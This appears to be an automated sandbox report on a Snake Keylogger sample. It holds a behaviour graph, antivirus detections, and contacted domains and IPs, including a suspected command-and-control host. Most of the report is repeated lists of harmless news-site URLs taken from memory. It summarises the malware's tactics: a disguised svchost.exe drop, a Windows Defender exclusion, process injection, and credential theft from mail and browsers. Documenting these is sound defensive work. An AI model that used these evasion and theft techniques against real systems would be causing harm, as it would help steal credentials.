                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383847 Sample: lfQuSBwdSf.exe Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 58 checkip.dyndns.org 2->58 60 freegeoip.app 2->60 62 checkip.dyndns.com 2->62 78 Found malware configuration 2->78 80 Multi AV Scanner detection for submitted file 2->80 82 Yara detected Snake Keylogger 2->82 84 4 other signatures 2->84 8 lfQuSBwdSf.exe 18 7 2->8         started        13 svchost.exe 3 2->13         started        15 svchost.exe 2->15         started        17 11 other processes 2->17 signatures3 process4 dnsIp5 70 checkip.dyndns.org 8->70 72 myliverpoolnews.cf 104.21.56.119, 443, 49700, 49701 CLOUDFLARENETUS United States 8->72 74 checkip.dyndns.com 8->74 54 C:\Windows\Cursors\...\svchost.exe, PE32 8->54 dropped 56 C:\Windows\...\svchost.exe:Zone.Identifier, ASCII 8->56 dropped 90 May check the online IP address of the machine 8->90 92 Creates an autostart registry key pointing to binary in C:\Windows 8->92 94 Adds a directory exclusion to Windows Defender 8->94 96 Drops PE files with benign system names 8->96 19 lfQuSBwdSf.exe 8->19         started        23 WerFault.exe 8->23         started        26 cmd.exe 1 8->26         started        34 3 other processes 8->34 98 Multi AV Scanner detection for dropped file 13->98 100 Machine Learning detection for dropped file 13->100 102 Tries to delay execution (extensive OutputDebugStringW loop) 13->102 104 Injects a PE file into a foreign processes 13->104 106 Hides threads from debuggers 15->106 28 powershell.exe 15->28         started        30 powershell.exe 15->30         started        32 powershell.exe 15->32         started        76 127.0.0.1 unknown unknown 17->76 108 Changes security center settings (notifications, updates, antivirus, firewall) 17->108 file6 signatures7 process8 dnsIp9 64 checkip.dyndns.org 19->64 66 checkip.dyndns.com 162.88.193.70, 49720, 49722, 49726 DYNDNSUS United States 19->66 68 2 other IPs or domains 19->68 86 Tries to steal Mail credentials (via file access) 19->86 88 Tries to harvest and steal browser information (history, passwords, etc) 19->88 52 C:\ProgramData\Microsoft\...\Report.wer, Little-endian 23->52 dropped 36 conhost.exe 26->36         started        38 timeout.exe 1 26->38         started        40 conhost.exe 28->40         started        42 conhost.exe 30->42         started        44 conhost.exe 32->44         started        46 conhost.exe 34->46         started        48 conhost.exe 34->48         started        50 conhost.exe 34->50         started        file10 signatures11 process12

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      lfQuSBwdSf.exe25%VirustotalBrowse
                      lfQuSBwdSf.exe29%ReversingLabsByteCode-MSIL.Trojan.Pwsx
                      lfQuSBwdSf.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe100%Joe Sandbox ML
                      C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe29%ReversingLabsByteCode-MSIL.Trojan.Pwsx

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      21.2.lfQuSBwdSf.exe.400000.0.unpack100%AviraTR/Spy.GenDownload File

                      Domains

                      SourceDetectionScannerLabelLink
                      myliverpoolnews.cf2%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-1716680%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-0%URL Reputationsafe
                      http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7C92219C6C42B363C26A6A670922F074.html0%Avira URL Cloudsafe
                      http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-133B76AB9374D6781F41A2D553BC2BA3.html0%Avira URL Cloudsafe
                      https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
                      https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
                      https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-118370%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.0%URL Reputationsafe
                      http://checkip.dyndns.org/0%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
                      https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
                      https://www.liverpool.com/all-about/premier-league0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/0%URL Reputationsafe
                      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
                      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
                      https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-171661540%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-199578500%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-020%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/featuresnC0%Avira URL Cloudsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://contoso.com/Icon0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorst0%URL Reputationsafe
                      https://reachplc.hub.loginradius.com&quot;0%Avira URL Cloudsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.0%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%URL Reputationsafe
                      https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%URL Reputationsafe
                      https://s2-prod.liverpool.com0%URL Reputationsafe
                      https://s2-prod.liverpool.com0%URL Reputationsafe
                      https://s2-prod.liverpool.com0%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%URL Reputationsafe
                      https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-199458160%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      myliverpoolnews.cf
                      		104.21.56.119
                      		truefalseunknown
                      freegeoip.app
                      		172.67.188.154
                      		truefalse
                        		unknown
                        checkip.dyndns.com
                        		162.88.193.70
                        		truefalse
                          		unknown
                          checkip.dyndns.org
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-7C92219C6C42B363C26A6A670922F074.htmlfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-133B76AB9374D6781F41A2D553BC2BA3.htmlfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://checkip.dyndns.org/false
                            • Avira URL Cloud: safe
                            		unknown
                            http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5C52937048F55BFE92995966F69D90F1.htmlfalse
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            https://c.amazon-adsystem.com/aax2/apstag.jslfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                              		high
                              https://www.liverpool.com/liverpool-fc-news/features/liverpool-arsenal-klopp-lijnders-carabao-171668lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://i2-prod.liverpoolecho.co.uk/incoming/article17165318.ece/ALTERNATES/s615/2_GettyImages-11837lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://i2-prod.liverpool.com/incoming/article19961953.ece/ALTERNATES/s180/0_GettyImages-1302496803.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jplfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://www.liverpool.com/all-about/premier-leaguelfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.pnglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s180/1_WhatsApp-Image-2021-03-lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://www.liverpool.com/liverpool-fc-news/lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://www.liverpool.com/schedule/liverpool-arsenal-carabao-cup-klopp-17166154lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		unknown
                              https://nuget.org/nuget.exepowershell.exe, 00000005.00000002.536067747.00000000058E2000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.535279406.0000000005E25000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmpfalse
                                		high
                                https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://www.liverpool.com/liverpool-fc-news/features/liverpool-psg-transfer-news-19957850lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namelfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.522995118.0000000004881000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.520364713.0000000004DC1000.00000004.00000001.sdmpfalse
                                  		high
                                  https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.jslfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                    		high
                                    https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.pnglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-1876lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.liverpool.com/liverpool-fc-news/featuresnClfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000005.00000002.526440831.00000000049BB000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmpfalse
                                        		high
                                        https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-1996166lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://contoso.com/Iconpowershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.liverpool.com/liverpool-fc-news/transfer-news/liverpool-erling-haaland-transfer-weghorstlfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://reachplc.hub.loginradius.com&quot;lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		low
                                        https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.pnglfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-1273716690lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://s2-prod.liverpool.comlfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.liverpool.com/liverpool-fc-news/features/mohamed-salah-liverpool-goal-flaw-19945816lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://%s.xboxlive.comsvchost.exe, 00000014.00000002.502117639.000001DDF383E000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		low
